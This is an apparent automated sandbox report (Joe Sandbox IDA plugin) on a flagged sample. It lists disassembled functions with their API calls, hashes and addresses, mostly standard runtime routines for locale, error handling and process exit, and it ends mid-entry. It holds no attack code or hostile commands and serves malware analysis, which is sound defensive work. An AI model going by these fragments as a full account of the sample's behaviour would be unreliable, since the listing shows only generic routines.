                                                                              • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                              • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                              • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                            • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004307AC,?,?,?,?,00430203,?,00000004), ref: 0043B0DC
                                                                            • _wcschr.LIBVCRUNTIME ref: 0043B16C
                                                                            • _wcschr.LIBVCRUNTIME ref: 0043B17A
                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004307AC,00000000,004308CC), ref: 0043B21D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                                            • String ID:
                                                                            • API String ID: 2444527052-0
                                                                            • Opcode ID: 7ed3a86c29a382af421c1474aa1bc1332d6e23e5dd750d7bbc09ab77345b00e1
                                                                            • Instruction ID: 0696757347486699991afdae1c367ad9a815ca2b39bc809b388401715a4d6b3e
                                                                            • Opcode Fuzzy Hash: 7ed3a86c29a382af421c1474aa1bc1332d6e23e5dd750d7bbc09ab77345b00e1
                                                                            • Instruction Fuzzy Hash: D1611871600206AADB24AB75DC46BBB73A8EF0D340F14146FFA15D7281EB7CE95087E9
                                                                            APIs
                                                                              • Part of subcall function 021C2131: GetLastError.KERNEL32(?,?,021BA9DC,?,00000000,?,021BCDD6,02192474,00000000,?,00451F20), ref: 021C2135
                                                                              • Part of subcall function 021C2131: _free.LIBCMT ref: 021C2168
                                                                              • Part of subcall function 021C2131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021C21A9
                                                                            • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,021C0A13,?,?,?,?,021C046A,?,00000004), ref: 021CB343
                                                                            • _wcschr.LIBVCRUNTIME ref: 021CB3D3
                                                                            • _wcschr.LIBVCRUNTIME ref: 021CB3E1
                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,021C0A13,00000000,021C0B33), ref: 021CB484
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
                                                                            • String ID:
                                                                            • API String ID: 2444527052-0
                                                                            • Opcode ID: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                                            • Instruction ID: 0fc77e8c897f9a8ad998c570067e9951366eaef7528315704c64bb6932cec51b
                                                                            • Opcode Fuzzy Hash: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
                                                                            • Instruction Fuzzy Hash: AF61FB79A88205AED725AF74DC42BBB73ADEF24718F24403EE915D7180E774E600CBA0
                                                                            APIs
                                                                              • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                              • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                              • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                              • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F29
                                                                              • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F36
                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B439
                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B48A
                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B54A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorInfoLastLocale$_free
                                                                            • String ID:
                                                                            • API String ID: 2834031935-0
                                                                            • Opcode ID: caee69047279a6347e873e3f4e2a46e9bba25e4d94b1d1d1a57b8ed79edba979
                                                                            • Instruction ID: f1e76511527bd8b46bed2dc81967877e1a53036e4ad42a1ad25ba8e4a7fcb861
                                                                            • Opcode Fuzzy Hash: caee69047279a6347e873e3f4e2a46e9bba25e4d94b1d1d1a57b8ed79edba979
                                                                            • Instruction Fuzzy Hash: 2461A571500207ABEF289F25CC82BBA77A8EF08318F10507BEE15C6681E73DD951CB99
                                                                            APIs
                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042A4BB
                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0042A4C5
                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0042A4D2
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                            • String ID:
                                                                            • API String ID: 3906539128-0
                                                                            • Opcode ID: 815768619075a8870a7dbdefa306677595f55cc39088b32ded2df8e6e8af0d4d
                                                                            • Instruction ID: 026f9f506817a9816d6037b847677398505f2b74d93b69b13e61bf99ecfd2c2c
                                                                            • Opcode Fuzzy Hash: 815768619075a8870a7dbdefa306677595f55cc39088b32ded2df8e6e8af0d4d
                                                                            • Instruction Fuzzy Hash: BC31D8749012289BCB21DF24D9887CDBBB4AF08711F5041EAE81CA7250EB749F958F49
                                                                            APIs
                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0219DACD), ref: 021BA722
                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0219DACD), ref: 021BA72C
                                                                            • UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,0219DACD), ref: 021BA739
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                            • String ID:
                                                                            • API String ID: 3906539128-0
                                                                            • Opcode ID: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
                                                                            • Instruction ID: c6697d3bf7b3d4d017421ec7011a9fc1b391f8816a2ed40a80e8b8e724f023d0
                                                                            • Opcode Fuzzy Hash: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
                                                                            • Instruction Fuzzy Hash: 9931C37494122CABCB21DF64DD887DCBBB8BF18710F5042EAE80CA7250EB309B858F44
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(00000003,?,0042FE25,00000003,00457970,0000000C,0042FF7C,00000003,00000002,00000000,?,0042DFAF,00000003), ref: 0042FE70
                                                                            • TerminateProcess.KERNEL32(00000000,?,0042FE25,00000003,00457970,0000000C,0042FF7C,00000003,00000002,00000000,?,0042DFAF,00000003), ref: 0042FE77
                                                                            • ExitProcess.KERNEL32 ref: 0042FE89
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: Process$CurrentExitTerminate
                                                                            • String ID:
                                                                            • API String ID: 1703294689-0
                                                                            • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                            • Instruction ID: cbe936bc43631a6ebab221667e08f429fe6a913ec22d428f2decb57a07c45d03
                                                                            • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                            • Instruction Fuzzy Hash: F9E08C31100548AFCF126F60ED09A5A3B39FF11B86F850479F8068B276CB39EE42CB48
                                                                            APIs
                                                                            • GetCurrentProcess.KERNEL32(00000000,?,021C008C,00000000,00457970,0000000C,021C01E3,00000000,00000002,00000000), ref: 021C00D7
                                                                            • TerminateProcess.KERNEL32(00000000,?,021C008C,00000000,00457970,0000000C,021C01E3,00000000,00000002,00000000), ref: 021C00DE
                                                                            • ExitProcess.KERNEL32 ref: 021C00F0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Process$CurrentExitTerminate
                                                                            • String ID:
                                                                            • API String ID: 1703294689-0
                                                                            • Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                            • Instruction ID: 77fb0f99968d1184f781131a0ca7483572e413a65746211125eaf350c89c9c47
                                                                            • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                            • Instruction Fuzzy Hash: 71E0B639040248EFCF116F64DD08A597B6AFB59B96F614028FA459B221CB36EE52CA84
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: .$GetProcAddress.$l
                                                                            • API String ID: 0-2784972518
                                                                            • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                            • Instruction ID: db69b3cd4e696cfe95b69e1f9343a671169d277af600fb07b61bb0818122ff5f
                                                                            • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                            • Instruction Fuzzy Hash: 20313AB6940609DFDB10CF99C880AAEBBF5FF48324F15404AD845A7310D771EA45CFA4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: /
                                                                            • API String ID: 0-2043925204
                                                                            • Opcode ID: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
                                                                            • Instruction ID: 3adc650e711776362111ab5e43553b3f0cbdd7ddf1b9c00206e195fcc59ee936
                                                                            • Opcode Fuzzy Hash: 9f35882ade819549731607cbebdcf7e443c3af80474b374bb13d2dd880a55ca5
                                                                            • Instruction Fuzzy Hash: FB414B725003196FCB20AFB9DC49EBBB778EB88314F10026EF915D7281EA749D41CB58
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: /
                                                                            • API String ID: 0-2043925204
                                                                            • Opcode ID: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
                                                                            • Instruction ID: 4cca91f451ad3d29cc96acfe407882d3fecf9e1d759814613eabceee128231a9
                                                                            • Opcode Fuzzy Hash: 214cb01e33ec6b9459e4b79cb8e50baccc65f9bab5c6278872b1ce9ffd0fa8ee
                                                                            • Instruction Fuzzy Hash: 9541037A940218AECB249FB9DC88EFB77B9EF90715F20426DE90597180E7319D81CB54
                                                                            APIs
                                                                            • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,00430203,?,00000004), ref: 00435203
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: InfoLocale
                                                                            • String ID: GetLocaleInfoEx
                                                                            • API String ID: 2299586839-2904428671
                                                                            • Opcode ID: cb6fe6aba531d19615e9b09a8e77e06eed824ebb7129d9e125764b32f0a2e06d
                                                                            • Instruction ID: 77d2a6705551c22c9c4f0428a2f6e8a78b6e695a94441c88a724e02477ae1ec3
                                                                            • Opcode Fuzzy Hash: cb6fe6aba531d19615e9b09a8e77e06eed824ebb7129d9e125764b32f0a2e06d
                                                                            • Instruction Fuzzy Hash: C3F09631A81318BBDF116F51DC02FAE7B65EF18B12F10416AFC0567290DA769920AA9D
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 47af0fffafc6034098a66fb6813f004731177b6d1efb7719fab4c4e099b30d71
                                                                            • Instruction ID: 3e9e42cc23dfcbd4fdb8553ee609b72eaaad40ee2fbbc40375509bb09f17fb16
                                                                            • Opcode Fuzzy Hash: 47af0fffafc6034098a66fb6813f004731177b6d1efb7719fab4c4e099b30d71
                                                                            • Instruction Fuzzy Hash: 2B024D71E002299BDF14CFAAD9806AEFBF1EF48314F55416AD919E7340D734AD41CB94
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: c91f95ec68f77aac8bd11e5e0ea726c20680edc7db15408a80b56bc1815cf2ba
                                                                            • Instruction ID: 2ff0806c3e93d29064857130bc317e06e72e08b090d7dc7fa0638feaf11f2001
                                                                            • Opcode Fuzzy Hash: c91f95ec68f77aac8bd11e5e0ea726c20680edc7db15408a80b56bc1815cf2ba
                                                                            • Instruction Fuzzy Hash: D5022B71E402199FDF15CFA9C8906EDB7F2EF48314F25826AE919E7384D731A942CB90
                                                                            APIs
                                                                            • NtdllDefWindowProc_W.NTDLL(?,?,?,?), ref: 02192622
                                                                            • PostQuitMessage.USER32(00000000), ref: 021927C0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MessageNtdllPostProc_QuitWindow
                                                                            • String ID:
                                                                            • API String ID: 4264772764-0
                                                                            • Opcode ID: d57fbe59a329fb309be7fe1269fcb85092641ffb4e542ab0082b7c0a7099a69f
                                                                            • Instruction ID: 52433e5036555cdf2c58812a6a01b4a867c7e8b72f278189527e813f76bdd1ae
                                                                            • Opcode Fuzzy Hash: d57fbe59a329fb309be7fe1269fcb85092641ffb4e542ab0082b7c0a7099a69f
                                                                            • Instruction Fuzzy Hash: B941FD25964384A9E630EFA5BC45B2533B0FF64722F10652BE528CB2B2E3B28544C75E
                                                                            APIs
                                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00436CAA,?,?,00000008,?,?,0043F16B,00000000), ref: 00436EDC
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: ExceptionRaise
                                                                            • String ID:
                                                                            • API String ID: 3997070919-0
                                                                            • Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                            • Instruction ID: 4bead90866a6a8306652f63e3edf2d2e70f9049ab2994a866b46465668e927e2
                                                                            • Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                            • Instruction Fuzzy Hash: 13B15D35210609EFD715CF28C48AB657BE0FF09364F26D659E899CF2A1C339E992CB44
                                                                            APIs
                                                                            • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,021C6F11,?,?,00000008,?,?,021CF3D2,00000000), ref: 021C7143
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ExceptionRaise
                                                                            • String ID:
                                                                            • API String ID: 3997070919-0
                                                                            • Opcode ID: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                            • Instruction ID: f1c07cf9708c7f1ce274613e90b241478ebe8f33030dee63bca29e3185990423
                                                                            • Opcode Fuzzy Hash: 48238cf6710726b9619f53d2e144ba1457a585c9b7e66ee0334f1f17764c4bba
                                                                            • Instruction Fuzzy Hash: 0FB159352106089FD719CF28C48AB65BBA4FF55368F25865CE899CF2E1C376E992CF40
                                                                            APIs
                                                                              • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                              • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                              • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                              • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F29
                                                                              • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F36
                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B689
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$_free$InfoLocale
                                                                            • String ID:
                                                                            • API String ID: 2955987475-0
                                                                            • Opcode ID: 76bdead3310ffb9b1966938f0108c5245838f754ae1b95c719928bdd6cdfccfe
                                                                            • Instruction ID: 4c7343574116d105162f1c568ba8aea657e897f65ebfc7aca9760b93b0bda93a
                                                                            • Opcode Fuzzy Hash: 76bdead3310ffb9b1966938f0108c5245838f754ae1b95c719928bdd6cdfccfe
                                                                            • Instruction Fuzzy Hash: AA21863251020A9BDB249E26DC46BBB73A8EB48315F10117FFE01D6242EB79DD45CB99
                                                                            APIs
                                                                              • Part of subcall function 021C2131: GetLastError.KERNEL32(?,?,021BA9DC,?,00000000,?,021BCDD6,02192474,00000000,?,00451F20), ref: 021C2135
                                                                              • Part of subcall function 021C2131: _free.LIBCMT ref: 021C2168
                                                                              • Part of subcall function 021C2131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021C21A9
                                                                              • Part of subcall function 021C2131: _free.LIBCMT ref: 021C2190
                                                                              • Part of subcall function 021C2131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021C219D
                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 021CB8F0
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLast$_free$InfoLocale
                                                                            • String ID:
                                                                            • API String ID: 2955987475-0
                                                                            • Opcode ID: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
                                                                            • Instruction ID: cb6a3fe7ccb8aa59593326adf78d3d3090c072d504887ec120a46982a6eda4f1
                                                                            • Opcode Fuzzy Hash: 8d1e0dff99db69fa77e1a690083a2ab2b0404bead7d8da99940a9befd189831e
                                                                            • Instruction Fuzzy Hash: 1B2198B5598216AFDF289F24DC42BBA73ADEF64714F20017EED01D6540E735DA44CB50
                                                                            APIs
                                                                              • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                              • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                              • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                            • EnumSystemLocalesW.KERNEL32(0043B3E5,00000001,00000000,?,004307A5,?,0043BA12,00000000,?,?,?), ref: 0043B32F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$EnumLocalesSystem_free
                                                                            • String ID:
                                                                            • API String ID: 2016158738-0
                                                                            • Opcode ID: 9dfe4f960725340af2dbd28f6025354d562524789b7736a7d15e08a761a9ce4d
                                                                            • Instruction ID: 9dc9256a404de3575a93206041da1aaaa21de42e5a9a86f68168da1acedf184b
                                                                            • Opcode Fuzzy Hash: 9dfe4f960725340af2dbd28f6025354d562524789b7736a7d15e08a761a9ce4d
                                                                            • Instruction Fuzzy Hash: 6E1129372007019FDB189F39C89577BB791FF88318F15452EEA8687B40E3756902C784
                                                                            APIs
                                                                              • Part of subcall function 021C2131: GetLastError.KERNEL32(?,?,021BA9DC,?,00000000,?,021BCDD6,02192474,00000000,?,00451F20), ref: 021C2135
                                                                              • Part of subcall function 021C2131: _free.LIBCMT ref: 021C2168
                                                                              • Part of subcall function 021C2131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021C21A9
                                                                            • EnumSystemLocalesW.KERNEL32(0043B3E5,00000001,00000000,?,021C0A0C,?,021CBC79,00000000,?,?,?), ref: 021CB596
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLast$EnumLocalesSystem_free
                                                                            • String ID:
                                                                            • API String ID: 2016158738-0
                                                                            • Opcode ID: 8237f41eeff90cd2040f98b437445f2213d719484cbab9627a3f33809c66f75c
                                                                            • Instruction ID: ccce4fccf85ffdba9055b17fab62465d15c14dce10379f4d92d772bbec77ff5f
                                                                            • Opcode Fuzzy Hash: 8237f41eeff90cd2040f98b437445f2213d719484cbab9627a3f33809c66f75c
                                                                            • Instruction Fuzzy Hash: 7C11293B2047015FDB189F38C89167ABB92FF80758B24442DDA4687B40D771A602CB40
                                                                            APIs
                                                                              • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                              • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                              • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                            • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0043B603,00000000,00000000,?), ref: 0043B891
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$InfoLocale_free
                                                                            • String ID:
                                                                            • API String ID: 787680540-0
                                                                            • Opcode ID: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                                            • Instruction ID: 482b5923cda5358eb0558da95ee496ac7efb878bedc9635b3893494dc5c9647c
                                                                            • Opcode Fuzzy Hash: d4489b39268ae4454a785e185639656f72d6012a52ca4bd703596e7082c16f5e
                                                                            • Instruction Fuzzy Hash: 3DF0F932910116ABDB2CAA658C057BB775CEF44714F15542AEE05A3280EB39BE4586D8
                                                                            APIs
                                                                              • Part of subcall function 021C2131: GetLastError.KERNEL32(?,?,021BA9DC,?,00000000,?,021BCDD6,02192474,00000000,?,00451F20), ref: 021C2135
                                                                              • Part of subcall function 021C2131: _free.LIBCMT ref: 021C2168
                                                                              • Part of subcall function 021C2131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021C21A9
                                                                            • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,021CB86A,00000000,00000000,?), ref: 021CBAF8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLast$InfoLocale_free
                                                                            • String ID:
                                                                            • API String ID: 787680540-0
                                                                            • Opcode ID: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                                            • Instruction ID: f47675cfb59865ebbec92dfb968e3d6c0919582bb60267b7aceeb0b26e0e22dd
                                                                            • Opcode Fuzzy Hash: 211d6faacd7aebbddaf1521eced52ad029ab4ad6bdece50ad0f57ab5ad071f03
                                                                            • Instruction Fuzzy Hash: 49F0FE3A648115ABDB345A54CC06BBB7758DB5071CF25442DDC45E3144DB70BF01C6D0
                                                                            APIs
                                                                              • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                              • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                              • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                            • EnumSystemLocalesW.KERNEL32(0043B635,00000001,?,?,004307A5,?,0043B9D6,004307A5,?,?,?,?,?,004307A5,?,?), ref: 0043B3A4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLast$EnumLocalesSystem_free
                                                                            • String ID:
                                                                            • API String ID: 2016158738-0
                                                                            • Opcode ID: 195a4d8fd23d0ae4e4fd4f8fbfc6d5bb400bfe136b198b29952dc109111c3991
                                                                            • Instruction ID: 4cae78c4b35d7b4c31765c23ce642d4c98f9d5783de0998693dc6c617ff1b9a7
                                                                            • Opcode Fuzzy Hash: 195a4d8fd23d0ae4e4fd4f8fbfc6d5bb400bfe136b198b29952dc109111c3991
                                                                            • Instruction Fuzzy Hash: 65F0C2362003045FDB149F399C92B7A7B95EF85768F15452EFE058B690D7B59C028788
                                                                            APIs
                                                                              • Part of subcall function 021C2131: GetLastError.KERNEL32(?,?,021BA9DC,?,00000000,?,021BCDD6,02192474,00000000,?,00451F20), ref: 021C2135
                                                                              • Part of subcall function 021C2131: _free.LIBCMT ref: 021C2168
                                                                              • Part of subcall function 021C2131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021C21A9
                                                                            • EnumSystemLocalesW.KERNEL32(0043B635,00000001,?,?,021C0A0C,?,021CBC3D,021C0A0C,?,?,?,?,?,021C0A0C,?,?), ref: 021CB60B
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
